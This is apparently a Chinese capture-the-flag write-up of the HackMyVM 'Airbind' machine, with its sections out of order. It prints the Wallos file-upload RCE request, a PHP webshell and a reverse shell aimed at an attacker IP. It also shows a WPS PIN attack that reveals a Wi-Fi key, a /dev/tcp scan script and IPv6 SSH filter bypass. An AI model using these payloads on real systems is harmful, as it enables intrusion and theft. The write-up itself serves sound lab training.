Dec 13 22:00 51924.txt\n-rw-r--r-- 1 kali kali 81719 Dec 13 21:56 ferox-http_10_0_2_21-1734144980.state\n-rw-r--r-- 1 kali kali 5996 Dec 13 22:01 ferox-http_10_0_2_21-1734145306.state\n-rw-r--r-- 1 kali kali 61 Dec 13 22:13 hash\n-rw------- 1 kali kali 2590 Dec 13 22:55 id_rsa\n-rw-r--r-- 1 kali kali 565 Dec 13 22:55 id_rsa.pub\n-rw-r--r-- 1 kali kali 3919 Dec 13 22:30 shell.php\n-rw-r--r-- 1 kali kali 65536 Dec 13 22:05 wallos.db\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Airbind]\n\u2514\u2500$ chmod 600 id_rsa\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Airbind]\n\u2514\u2500$ ssh root@fe80::a00:27ff:fe1b:404c%eth0 -i id_rsa\nThe authenticity of host 'fe80::a00:27ff:fe1b:404c%eth0 (fe80::a00:27ff:fe1b:404c%eth0)' can't be established.\nED25519 key fingerprint is SHA256:La9YyHs4GERVO8XTRRw0cLh6XcInXX35Ar9OiMsXwQk.\nThis host key is known by the following other names\/addresses:\n ~\/.ssh\/known_hosts:89: [hashed name]\nAre you sure you want to continue connecting (yes\/no\/[fingerprint])? yes\nWarning: Permanently added 'fe80::a00:27ff:fe1b:404c%eth0' (ED25519) to the list of known hosts.\nLinux airbind 6.1.0-18-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.76-1 (2024-02-01) x86_64\n\nThe programs included with the Debian GNU\/Linux system are free software;\nthe exact distribution terms for each program are described in the\nindividual files in \/usr\/share\/doc\/*\/copyright.\n\nDebian GNU\/Linux comes with ABSOLUTELY NO WARRANTY, to the extent\npermitted by applicable law.\nroot@airbind:~# whoami;id;ls -la\nroot\nuid=0(root) gid=0(root) groupes=0(root)\ntotal 32\ndrwx------ 5 root root 4096 21 mai 2024 .\ndrwxr-xr-x 18 root root 4096 1 avril 2024 ..\nlrwxrwxrwx 1 root root 9 9 mars 2024 .bash_history -> \/dev\/null\n-rw-r--r-- 1 root root 571 10 avril 2021 .bashrc\ndrwx------ 2 root root 4096 2 avril 2024 .config\ndrwxr-xr-x 3 root root 4096 1 avril 2024 .local\n-rw-r--r-- 1 root root 161 9 juil. 2019 .profile\n-rwx------ 1 root root 33 2 avril 2024 root.txt\ndrwx------ 2 root root 4096 2 avril 2024 .ssh<\/code><\/pre>\n\u539f\u7406\u5927\u6982\u662f\u4e3b\u673a\u8bbe\u7f6e\u4e86\u4e00\u4e2aip\u7684\u8fc7\u6ee4\uff0c\u4e0d\u80fd\u4ece\u4e00\u822c\u9014\u5f84\u8fdb\u884c\u767b\u5f55\uff0c\u4f46\u662fipv6\u534f\u8bae\u6070\u597d\u53ef\u4ee5\u7ed5\u8fc7\u8fd9\u4e2a\u8fc7\u6ee4\u3002<\/p>\n
\n\u4ece\u8fd9\u91cc\u53ef\u4ee5\u770b\u5230\u5931\u8d25\u7684\u539f\u56e0\u53ef\u80fd\u662f\u865a\u62df\u673a\u5185\u7684\u90a3\u4e2awifi\u7f51\u5361\u548c\u6211\u672c\u5730\u7684\u7f51\u5361\u51b2\u7a81\u4e86\u3002<\/p>\n<\/blockquote>\n
\u65b9\u6cd5\u4e8c\uff1a\u4f5c\u8005\u89e3\u6cd5<\/h3>\n
\u5148\u626b\u63cf\u4e86\u4e00\u4e0b\u8fd9\u4e2a\u5f00\u653e\u7684\u65e0\u7ebf\u7aef\u53e3\u7684\u4fe1\u606f\u3002<\/p>\n
root@ubuntu:~# iwlist wlan0 scanning\nwlan0 Scan completed :\n Cell 01 - Address: 02:00:00:00:01:00\n Channel:7\n Frequency:2.442 GHz (Channel 7)\n Quality=70\/70 Signal level=-30 dBm \n Encryption key:on\n ESSID:"TL-WR842ND"\n Bit Rates:1 Mb\/s; 2 Mb\/s; 5.5 Mb\/s; 11 Mb\/s; 6 Mb\/s\n 9 Mb\/s; 12 Mb\/s; 18 Mb\/s\n Bit Rates:24 Mb\/s; 36 Mb\/s; 48 Mb\/s; 54 Mb\/s\n Mode:Master\n Extra:tsf=0006293310197962\n Extra: Last beacon: 80ms ago\n IE: Unknown: 000A544C2D57523834324E44\n IE: Unknown: 010882848B960C121824\n IE: Unknown: 030107\n IE: Unknown: 2A0104\n IE: Unknown: 32043048606C\n IE: IEEE 802.11i\/WPA2 Version 1\n Group Cipher : CCMP\n Pairwise Ciphers (1) : CCMP\n Authentication Suites (1) : PSK\n IE: Unknown: 3B025100\n IE: Unknown: 7F080400400200000040\n IE: Unknown: DDA90050F204104A00011010440001021041000101101200020000105300022108103B00010310470010572CF82FC95756539B16B5CFB298ABF11021000754502D4C494E4B1023000A544C2D57523834324E4410240001201042001D51514848302D36465943582D45515A52502D4C585642302D37423848531054000800010050F20400011011000A544C2D57523834324E441008000221081049000E00372A0001200106FFFFFFFFFFFF<\/code><\/pre>\n\u627e\u5230\u4e86\u7248\u672c\u53f7\uff0c\u7136\u540e\u627e\u5230\u624b\u518c\uff0c\u67e5\u770b\u4e00\u4e0b\u9ed8\u8ba4pin\u7801\uff1a<\/p>\n
<\/div>
\n<\/div>
\n<\/div><\/p>\n\u7136\u540e\u5c1d\u8bd5\u4f7f\u7528wpa_supplicant<\/code>\u5bf9\u65e0\u7ebf\u8bbe\u65bd\u8fdb\u884c\u63a7\u5236\uff0c\u914d\u7f6e\u4e00\u4e0b\u6587\u4ef6\uff1a<\/p>\n<\/div><\/p>\n\/etc\/wpa_supplicant\/wpa_supplicant.conf\nctrl_interface=\/run\/wpa_supplicant\nupdate_config=1<\/code><\/pre>\n\u8fdb\u884c\u6dfb\u52a0\uff1a<\/p>\n
#~\/wpa_supplicant.conf\nctrl_interface=\/var\/run\/wpa_supplicant\nupdate_config=1<\/code><\/pre>\n\u7136\u540e\u5c1d\u8bd5\u8fdb\u884c\u5728\u540e\u53f0\u521d\u59cb\u5316\uff1a<\/p>\n
root@ubuntu:~# wpa_supplicant -i wlan0 -c wpa_supplicant.conf -B\nSuccessfully initialized wpa_supplicant\nrfkill: Cannot open RFKILL control device\nrfkill: Cannot get wiphy information<\/code><\/pre>\n\u7136\u540e\u5c1d\u8bd5\u8fdb\u884c\u8fde\u63a5\uff1a<\/p>\n
root@ubuntu:~# wpa_cli\nwpa_cli v2.10\nCopyright (c) 2004-2022, Jouni Malinen <j@w1.fi> and contributors\n\nThis software may be distributed under the terms of the BSD license.\nSee README for more details.\n\nSelected interface 'wlan0'\n\nInteractive mode\n\n> wps_pin any 55117319\n55117319\n<3>CTRL-EVENT-NETWORK-ADDED 0\n<3>WPS-PIN-ACTIVE \n<3>CTRL-EVENT-SCAN-STARTED \n<3>CTRL-EVENT-SCAN-RESULTS \n<3>WPS-AP-AVAILABLE-AUTH \n<3>SME: Trying to authenticate with 02:00:00:00:01:00 (SSID='TL-WR842ND' freq=2442 MHz)\n<3>Trying to associate with 02:00:00:00:01:00 (SSID='TL-WR842ND' freq=2442 MHz)\n<3>Associated with 02:00:00:00:01:00\n<3>CTRL-EVENT-SUBNET-STATUS-UPDATE status=0\n<3>CTRL-EVENT-EAP-STARTED EAP authentication started\n<3>CTRL-EVENT-EAP-STATUS status='started' parameter=''\n<3>CTRL-EVENT-EAP-PROPOSED-METHOD vendor=14122 method=1\n<3>CTRL-EVENT-EAP-STATUS status='accept proposed method' parameter='WSC'\n<3>CTRL-EVENT-EAP-METHOD EAP vendor 14122 method 1 (WSC) selected\n<3>WPS-CRED-RECEIVED \n<3>WPS-SUCCESS \n<3>CTRL-EVENT-EAP-STATUS status='completion' parameter='failure'\n<3>CTRL-EVENT-EAP-FAILURE EAP authentication failed\n<3>CTRL-EVENT-DISCONNECTED bssid=02:00:00:00:01:00 reason=3 locally_generated=1\n<3>CTRL-EVENT-DSCP-POLICY clear_all\n<3>SME: Trying to authenticate with 02:00:00:00:01:00 (SSID='TL-WR842ND' freq=2442 MHz)\n<3>Trying to associate with 02:00:00:00:01:00 (SSID='TL-WR842ND' freq=2442 MHz)\n<3>Associated with 02:00:00:00:01:00\n<3>CTRL-EVENT-SUBNET-STATUS-UPDATE status=0\n<3>WPA: Key negotiation completed with 02:00:00:00:01:00 [PTK=CCMP GTK=CCMP]\n<3>CTRL-EVENT-CONNECTED - Connection to 02:00:00:00:01:00 completed [id=0 id_str=]<\/code><\/pre>\n\u53d1\u73b0\u94fe\u63a5\u4e0a\u53bb\u4e86\u3002<\/p>\n
root@ubuntu:~# dhclient wlan0\nroot@ubuntu:~# cat wpa_supplicant.conf \nctrl_interface=\/var\/run\/wpa_supplicant\nupdate_config=1\n\nnetwork={\n ssid="TL-WR842ND"\n psk="leEAYAejoIDJ7pU4jykJ7kCkEh3gx1"\n proto=RSN\n key_mgmt=WPA-PSK\n pairwise=CCMP-256 GCMP-256 CCMP GCMP\n group=CCMP-256 GCMP-256 CCMP GCMP TKIP\n auth_alg=OPEN\n mesh_fwding=1\n pbss=2\n}<\/code><\/pre>\nroot@ubuntu:~# route -n\nKernel IP routing table\nDestination Gateway Genmask Flags Metric Ref Use Iface\n0.0.0.0 10.0.3.1 0.0.0.0 UG 0 0 0 eth0\n10.0.3.0 0.0.0.0 255.255.255.0 U 0 0 0 eth0\n192.168.10.0 0.0.0.0 255.255.255.0 U 0 0 0 wlan0<\/code><\/pre>\n\u7136\u540e\u5c31\u662f\u5199\u811a\u672c\u5c1d\u8bd5\u5229\u7528\uff1a<\/p>\n
#!\/bin\/bash\n\nfor ip in {1..255} ; do\n timeout 1 bash -c "echo > \/dev\/tcp\/192.168.10.$ip\/22 2>\/dev\/null"\n [[ $? -eq 0 ]] && echo "192.168.10.$ip UP"\ndone<\/code><\/pre>\nroot@ubuntu:\/tmp# nano exp\nroot@ubuntu:\/tmp# cat exp\n#!\/bin\/bash\n\nfor ip in {1..255} ; do\n timeout 1 bash -c "echo > \/dev\/tcp\/192.168.10.$ip\/22 2>\/dev\/null"\n [[ $? -eq 0 ]] && echo "192.168.10.$ip UP"\ndone\nroot@ubuntu:\/tmp# chmod +x *\nroot@ubuntu:\/tmp# bash exp\n192.168.10.1 UP\n^C^C^C^C^C^C^C^C^C^C\n^C^Z\n[1]+ Stopped bash exp\nroot@ubuntu:\/tmp# cd ~\nroot@ubuntu:~# ssh 192.168.10.\nssh: Could not resolve hostname 192.168.10.: Name or service not known\nroot@ubuntu:~# ssh 192.168.10.1\nLinux airbind 6.1.0-18-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.76-1 (2024-02-01) x86_64\n\nThe programs included with the Debian GNU\/Linux system are free software;\nthe exact distribution terms for each program are described in the\nindividual files in \/usr\/share\/doc\/*\/copyright.\n\nDebian GNU\/Linux comes with ABSOLUTELY NO WARRANTY, to the extent\npermitted by applicable law.\nroot@airbind:~# whoami;id\nroot\nuid=0(root) gid=0(root) groupes=0(root)\nroot@airbind:~# ls -la\ntotal 32\ndrwx------ 5 root root 4096 21 mai 2024 .\ndrwxr-xr-x 18 root root 4096 1 avril 2024 ..\nlrwxrwxrwx 1 root root 9 9 mars 2024 .bash_history -> \/dev\/null\n-rw-r--r-- 1 root root 571 10 avril 2021 .bashrc\ndrwx------ 2 root root 4096 2 avril 2024 .config\ndrwxr-xr-x 3 root root 4096 1 avril 2024 .local\n-rw-r--r-- 1 root root 161 9 juil. 2019 .profile\n-rwx------ 1 root root 33 2 avril 2024 root.txt\ndrwx------ 2 root root 4096 2 avril 2024 .ssh<\/code><\/pre>\n\u540c\u6837\u62ff\u5230\u4e86shell\uff0c\u5e05\u7684\u4e00\u6279\uff01<\/p>\n
\u53c2\u8003<\/h2>\n
https:\/\/youtu.be\/OffNnj5RQJQ?si=Gzh4kVJqmL0GT0FZ<\/a><\/p>\nhttps:\/\/github.com\/HosseinVampire\/Writeups\/blob\/main\/Hackmyvm\/Machines\/Airbind\/Ctf.md<\/a><\/p>\nhttps:\/\/vishal-chandak.medium.com\/hackmyvm-airbind-2d776bc55fe1<\/a><\/p>\nhttps:\/\/blog.csdn.net\/tanbinn\/article\/details\/139784974<\/a><\/p>\n
\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Airbind]\n\u2514\u2500$ IP=10.0.2.21 \n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Airbind]\n\u2514\u2500$ rustscan -a $IP -- -sCV\n.----. .-. .-. .----..---. .----. .---. .--. .-. .-.\n| {} }| { } |{ {__ {_ _}{ {__ \/ ___} \/ {} \\ | `| |\n| .-. \\| {_} |.-._} } | | .-._} }\\ }\/ \/\\ \\| |\\ |\n`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'\nThe Modern Day Port Scanner.\n________________________________________\n: https:\/\/discord.gg\/GFrQsGy :\n: https:\/\/github.com\/RustScan\/RustScan :\n --------------------------------------\n\ud83d\ude35 https:\/\/admin.tryhackme.com\n\n[~] The config file is expected to be at "\/home\/kali\/.rustscan.toml"\n[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers\n[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'. \nOpen 10.0.2.21:80\n[~] Starting Script(s)\n[>] Script to be run Some("nmap -vvv -p {{port}} {{ip}}")\n\nPORT STATE SERVICE REASON VERSION\n80\/tcp open http syn-ack Apache httpd 2.4.57 ((Ubuntu))\n| http-methods: \n|_ Supported Methods: GET HEAD POST OPTIONS\n|_http-server-header: Apache\/2.4.57 (Ubuntu)\n| http-title: Wallos - Subscription Tracker\n|_Requested resource was login.php\n| http-cookie-flags: \n| \/: \n| PHPSESSID: \n|_ httponly flag not set\n|_http-favicon: Unknown favicon MD5: 81452C705B6AAB657F745B6FB4966367<\/code><\/pre>\n\u76ee\u5f55\u626b\u63cf<\/h3>\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Airbind]\n\u2514\u2500$ feroxbuster -u http:\/\/$IP -w \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt -d 1 -s 200 301 302 \n\n ___ ___ __ __ __ __ __ ___\n|__ |__ |__) |__) | \/ ` \/ \\ \\_\/ | | \\ |__\n| |___ | \\ | \\ | \\__, \\__\/ \/ \\ | |__\/ |___\nby Ben "epi" Risher \ud83e\udd13 ver: 2.10.4\n\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u252c\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\n \ud83c\udfaf Target Url \u2502 http:\/\/10.0.2.21\n \ud83d\ude80 Threads \u2502 50\n \ud83d\udcd6 Wordlist \u2502 \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt\n \ud83d\udc4c Status Codes \u2502 [200, 301, 302]\n \ud83d\udca5 Timeout (secs) \u2502 7\n \ud83e\udda1 User-Agent \u2502 feroxbuster\/2.10.4\n \ud83d\udc89 Config File \u2502 \/etc\/feroxbuster\/ferox-config.toml\n \ud83d\udd0e Extract Links \u2502 true\n \ud83c\udfc1 HTTP methods \u2502 [GET]\n \ud83d\udd03 Recursion Depth \u2502 1\n \ud83c\udf89 New Version Available \u2502 https:\/\/github.com\/epi052\/feroxbuster\/releases\/latest\n\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2534\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\n \ud83c\udfc1 Press [ENTER] to use the Scan Management Menu\u2122\n\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\n302 GET 0l 0w 0c http:\/\/10.0.2.21\/ => login.php\n301 GET 9l 28w 307c http:\/\/10.0.2.21\/images => http:\/\/10.0.2.21\/images\/\n301 GET 9l 28w 308c http:\/\/10.0.2.21\/scripts => http:\/\/10.0.2.21\/scripts\/\n301 GET 9l 28w 312c http:\/\/10.0.2.21\/screenshots => http:\/\/10.0.2.21\/screenshots\/\n301 GET 9l 28w 309c http:\/\/10.0.2.21\/includes => http:\/\/10.0.2.21\/includes\/\n301 GET 9l 28w 303c http:\/\/10.0.2.21\/db => http:\/\/10.0.2.21\/db\/\n301 GET 9l 28w 307c http:\/\/10.0.2.21\/styles => http:\/\/10.0.2.21\/styles\/\n301 GET 9l 28w 305c http:\/\/10.0.2.21\/libs => http:\/\/10.0.2.21\/libs\/\n[###>----------------] - 5m 36589\/220553 27m found:8 errors:2 \n\ud83d\udea8 Caught ctrl+c \ud83d\udea8 saving scan state to ferox-http_10_0_2_21-1734145306.state ...\n[###>----------------] - 5m 36589\/220553 27m found:8 errors:2 \n[###>----------------] - 5m 36575\/220546 114\/s http:\/\/10.0.2.21\/<\/code><\/pre>\n\u6f0f\u6d1e\u53d1\u73b0<\/h2>\n\u8e29\u70b9<\/h3>\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Airbind]\n\u2514\u2500$ whatweb http:\/\/$IP \nhttp:\/\/10.0.2.21 [302 Found] Apache[2.4.57], Cookies[PHPSESSID], Country[RESERVED][ZZ], HTTPServer[Ubuntu Linux][Apache\/2.4.57 (Ubuntu)], IP[10.0.2.21], RedirectLocation[login.php]\nhttp:\/\/10.0.2.21\/login.php [200 OK] Apache[2.4.57], Cookies[PHPSESSID], Country[RESERVED][ZZ], HTML5, HTTPServer[Ubuntu Linux][Apache\/2.4.57 (Ubuntu)], IP[10.0.2.21], PasswordField[password], Title[Wallos - Subscription Tracker]<\/code><\/pre>\n\u53d1\u73b0\u4e86\u7591\u4f3c\u6846\u67b6\uff0c\u5c1d\u8bd5\u68c0\u7d22\u4e00\u4e0b\uff1a<\/p>\n
<\/div><\/p>\n\u5f97\u770b\u4e00\u4e0b\u7248\u672c\u53f7\u5bf9\u4e0d\u5bf9\uff1a<\/p>\n
\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Airbind]\n\u2514\u2500$ curl -s http:\/\/$IP\/login.php \n<!DOCTYPE html>\n<html>\n<head>\n <meta charset="UTF-8">\n <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no">\n <meta name="theme-color" content="#FFFFFF"\/>\n <title>Wallos - Subscription Tracker<\/title>\n <link rel="icon" type="image\/png" href="images\/icon\/favicon.ico" sizes="16x16">\n <link rel="apple-touch-icon" sizes="180x180" href="images\/icon\/apple-touch-icon.png">\n <link rel="manifest" href="manifest.json">\n <link rel="stylesheet" href="styles\/login.css?v1.11.0">\n <link rel="stylesheet" href="styles\/barlow.css">\n <link rel="stylesheet" href="styles\/login-dark-theme.css?v1.11.0" id="dark-theme" disabled>\n<\/head>\n<body>\n <div class="content">\n <section class="container">\n <header>\n <img src="images\/wallossolid.png" alt="Wallos Logo" title="Wallos - Subscription Tracker" \/> <p>\n Please login <\/p>\n <\/header>\n <form action="login.php" method="post">\n <div class="form-group">\n <label for="username">Username:<\/label>\n <input type="text" id="username" name="username" required>\n <\/div>\n <div class="form-group">\n <label for="password">Password:<\/label>\n <input type="password" id="password" name="password" required>\n <\/div>\n <div class="form-group-inline">\n <input type="checkbox" id="remember" name="remember">\n <label for="remember">Stay logged in (30 days)<\/label>\n <\/div>\n <div class="form-group">\n <input type="submit" value="Login">\n <\/div>\n <\/form>\n <\/section>\n <\/div>\n<\/body>\n<\/html> <\/code><\/pre>\n\u53d1\u73b0\u7248\u672c\u53f7\u7591\u4f3c1.11.0<\/code>\uff0c\u5c1d\u8bd5\u8fdb\u884c\u5229\u7528\uff01<\/p>\n\u6587\u4ef6\u4e0a\u4f20\u6f0f\u6d1e\u5229\u7528<\/h3>\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Airbind]\n\u2514\u2500$ searchsploit -m php\/webapps\/51924.txt\n Exploit: Wallos < 1.11.2 - File Upload RCE\n URL: https:\/\/www.exploit-db.com\/exploits\/51924\n Path: \/usr\/share\/exploitdb\/exploits\/php\/webapps\/51924.txt\n Codes: N\/A\n Verified: False\nFile Type: ASCII text\nCopied to: \/home\/kali\/temp\/Airbind\/51924.txt\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Airbind]\n\u2514\u2500$ ls\n51924.txt ferox-http_10_0_2_21-1734144980.state\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Airbind]\n\u2514\u2500$ cat 51924.txt \n# Exploit Title: Wallos - File Upload RCE (Authenticated)\n# Date: 2024-03-04\n# Exploit Author: sml@lacashita.com\n# Vendor Homepage: https:\/\/github.com\/ellite\/Wallos\n# Software Link: https:\/\/github.com\/ellite\/Wallos\n# Version: < 1.11.2\n# Tested on: Debian 12\n\nWallos allows you to upload an image\/logo when you create a new subscription.\nThis can be bypassed to upload a malicious .php file.\n\nPOC\n---\n\n1) Log into the application.\n2) Go to "New Subscription"\n3) Upload Logo and choose your webshell .php\n4) Make the Request changing Content-Type to image\/jpeg and adding "GIF89a", it should be like:\n\n--- SNIP -----------------\n\nPOST \/endpoints\/subscription\/add.php HTTP\/1.1\n\nHost: 192.168.1.44\n\nUser-Agent: Mozilla\/5.0 (X11; Linux x86_64; rv:102.0) Gecko\/20100101 Firefox\/102.0\n\nAccept: *\/*\n\nAccept-Language: en-US,en;q=0.5\n\nAccept-Encoding: gzip, deflate\n\nReferer: http:\/\/192.168.1.44\/\n\nContent-Type: multipart\/form-data; boundary=---------------------------29251442139477260933920738324\n\nOrigin: http:\/\/192.168.1.44\n\nContent-Length: 7220\n\nConnection: close\n\nCookie: theme=light; language=en; PHPSESSID=6a3e5adc1b74b0f1870bbfceb16cda4b; theme=light\n\n-----------------------------29251442139477260933920738324\n\nContent-Disposition: form-data; name="name"\n\ntest\n\n-----------------------------29251442139477260933920738324\n\nContent-Disposition: form-data; name="logo"; filename="revshell.php"\n\nContent-Type: image\/jpeg\n\nGIF89a;\n\n<?php\nsystem($_GET['cmd']);\n?>\n\n-----------------------------29251442139477260933920738324\n\nContent-Disposition: form-data; name="logo-url"\n\n----- SNIP -----\n\n5) You will get the response that your file was uploaded ok:\n\n{"status":"Success","message":"Subscription updated successfully"}\n\n6) Your file will be located in:\nhttp:\/\/VICTIM_IP\/images\/uploads\/logos\/XXXXXX-yourshell.php <\/code><\/pre>\n\u5f31\u5bc6\u7801<\/h4>\n
\u5c1d\u8bd5\u6309\u7167\u6559\u7a0b\u8fdb\u884c\u5229\u7528\u4e00\u4e0b\uff01\u4f46\u662f\u53d1\u73b0\u6ca1\u6709\u7528\u6237\u548c\u5bc6\u7801\uff0c\u5c1d\u8bd5\u4e00\u4e0b\u5f31\u53e3\u4ee4\uff0c\u53d1\u73b0admin:admin<\/code>\u53ef\u4ee5\u6b63\u5e38\u8fdb\u5165\u3002<\/p>\n\u5176\u5b9e\u8fd9\u4e00\u4e2a\u4e5f\u6cc4\u9732\u8fc7\uff0c\u4f46\u662f\u4e4b\u524d\u6ca1\u53d1\u73b0\uff1a<\/p>\n
<\/div><\/p>\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Airbind]\n\u2514\u2500$ curl -s http:\/\/10.0.2.21\/db\/ | html2text\n****** Index of \/db ******\n[[ICO]] Name Last_modified Size Description\n===========================================================================\n[[PARENTDIR]] Parent_Directory - \n[[ ]] wallos.db 2024-12-14 03:05 64K \n===========================================================================\n Apache\/2.4.57 (Ubuntu) Server at 10.0.2.21 Port 80\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Airbind]\n\u2514\u2500$ wget http:\/\/10.0.2.21\/db\/wallos.db \n--2024-12-13 22:09:59-- http:\/\/10.0.2.21\/db\/wallos.db\nConnecting to 10.0.2.21:80... connected.\nHTTP request sent, awaiting response... 200 OK\nLength: 65536 (64K)\nSaving to: \u2018wallos.db\u2019\n\nwallos.db 100%[====================================================================================================>] 64.00K --.-KB\/s in 0.003s \n\n2024-12-13 22:10:00 (21.1 MB\/s) - \u2018wallos.db\u2019 saved [65536\/65536]\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Airbind]\n\u2514\u2500$ sqlite3 wallos.db\nSQLite version 3.45.1 2024-01-30 16:01:20\nEnter ".help" for usage hints.\nsqlite> .tables\ncategories login_tokens \ncurrencies migrations \ncycles notifications \nfixer payment_methods \nfrequencies settings \nhousehold subscriptions \nlast_exchange_update user \nlast_update_next_payment_date\nsqlite> select * from user;\n1|admin|admin@localhost.com|$2y$10$2XxuEupev6gU1qWoURsIYu7XHNiy7nve9iq7H0mUX\/MzFnmvbxC9S|1|0|en<\/code><\/pre>\n\u67e5\u4e00\u4e0b\u4e5f\u662fadmin<\/code>.<\/p>\n<\/div>
\n<\/div><\/p>\n\u6293\u5305\u6539\u5305<\/h4>\n
\u5148\u51c6\u5907\u4e00\u4e2a\u53cd\u5f39shell!<\/p>\n
\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Airbind]\n\u2514\u2500$ vim shell.php\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Airbind]\n\u2514\u2500$ head shell.php \nGIF89a;\n <?php\n \/\/ php-reverse-shell - A Reverse Shell implementation in PHP\n \/\/ Copyright (C) 2007 pentestmonkey@pentestmonkey.net\n\n set_time_limit (0);\n $VERSION = "1.0";\n $ip = '192.168.10.103'; \/\/ You have changed this\n $port = 1234; \/\/ And this\n $chunk_size = 1400;<\/code><\/pre>\n\u7136\u540e\u6dfb\u52a0\u8ba2\u9605\uff01<\/p>\n
<\/div><\/p>\n\u6539\u4e2a\u5305\uff1a<\/p>\n
Content-Type: application\/x-php\n\nContent-Type: image\/jpeg<\/code><\/pre>\n\u7136\u540e\u4fdd\u5b58\u4e00\u4e0b\uff0c\u8bbf\u95ee\u4e00\u4e0b\uff1a<\/p>\n
<\/div>
\n<\/div><\/p>\n\u7136\u540e\u5c1d\u8bd5\u8bbf\u95ee\u6fc0\u6d3b\uff1a<\/p>\n
<\/div><\/p>\n\u4f46\u662f\u4e0d\u884c\uff0c\u8001\u8001\u5b9e\u5b9e\u4e00\u53e5\u8bdd\u5427\u3002\u3002\u3002\u3002<\/p>\n
GIF89a;\n\n<?php\nsystem($_GET['cmd']);\n?><\/code><\/pre>\n\u518d\u8fdb\u884c\u5c1d\u8bd5\uff01<\/p>\n
\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Airbind]\n\u2514\u2500$ curl 'http:\/\/10.0.2.21\/images\/uploads\/logos\/1734147609-shell.php?cmd=whoami'\nGIF89a;\n\nwww-data<\/code><\/pre>\n\u6210\u529f\uff0c\u5c1d\u8bd5\u53cd\u5f39shell\uff01(\u7a81\u7136\u60f3\u8d77\u6765\u5931\u8d25\u53ef\u80fd\u662f\u56e0\u4e3a\u6211\u7684\u90a3\u4e2ashell\u7684ip\u586b\u9519\u4e86\u3002\u3002\u3002\u3002\u3002\u4e8e\u662f\u6211\u91cd\u65b0\u5c1d\u8bd5\u4e86\u4e00\u4e0b\uff0c\u53d1\u73b0\u6210\u529f\u4e86\u3002\u3002\u3002\u3002)<\/p>\n
<\/div><\/p>\n\u63d0\u6743<\/h2>\n\u4fe1\u606f\u641c\u96c6<\/h3>\n(remote) www-data@ubuntu:\/$ whoami;id;hostname\nwww-data\nuid=33(www-data) gid=33(www-data) groups=33(www-data)\nubuntu\n(remote) www-data@ubuntu:\/$ sudo -l\nMatching Defaults entries for www-data on ubuntu:\n env_reset, mail_badpass, secure_path=\/usr\/local\/sbin\\:\/usr\/local\/bin\\:\/usr\/sbin\\:\/usr\/bin\\:\/sbin\\:\/bin\\:\/snap\/bin, use_pty\n\nUser www-data may run the following commands on ubuntu:\n (ALL) NOPASSWD: ALL\n(remote) www-data@ubuntu:\/$ sudo su\nroot@ubuntu:\/# whoami;id\nroot\nuid=0(root) gid=0(root) groups=0(root)\nroot@ubuntu:\/# pwd\n\/\nroot@ubuntu:\/# cd ~\nroot@ubuntu:~# pwd\n\/root\nroot@ubuntu:~# ls -la\ntotal 40\ndrwx------ 4 root root 4096 May 21 2024 .\ndrwxr-xr-x 17 root root 4096 Dec 14 02:52 ..\nlrwxrwxrwx 1 root root 9 Apr 2 2024 .bash_history -> \/dev\/null\n-rw-r--r-- 1 root root 3106 Oct 17 2022 .bashrc\n-rw------- 1 root root 20 May 21 2024 .lesshst\ndrwxr-xr-x 3 root root 4096 Apr 1 2024 .local\n-rw-r--r-- 1 root root 161 Jul 9 2019 .profile\n-rw-r--r-- 1 root root 66 May 21 2024 .selected_editor\n-rw------- 1 root root 300 May 21 2024 .sqlite_history\ndrwx------ 2 root root 4096 Apr 2 2024 .ssh\n-rwx------ 1 root root 33 Apr 2 2024 user.txt\n-rw------- 1 root root 0 May 21 2024 .wpa_cli_history<\/code><\/pre>\n\u4f46\u662f\u53ea\u6709\u4e00\u4e2auser\u7684flag\u4ee5\u53ca\u79c1\u94a5\uff0c\u5148\u4fdd\u5b58\u4e0b\u6765\uff1a<\/p>\n
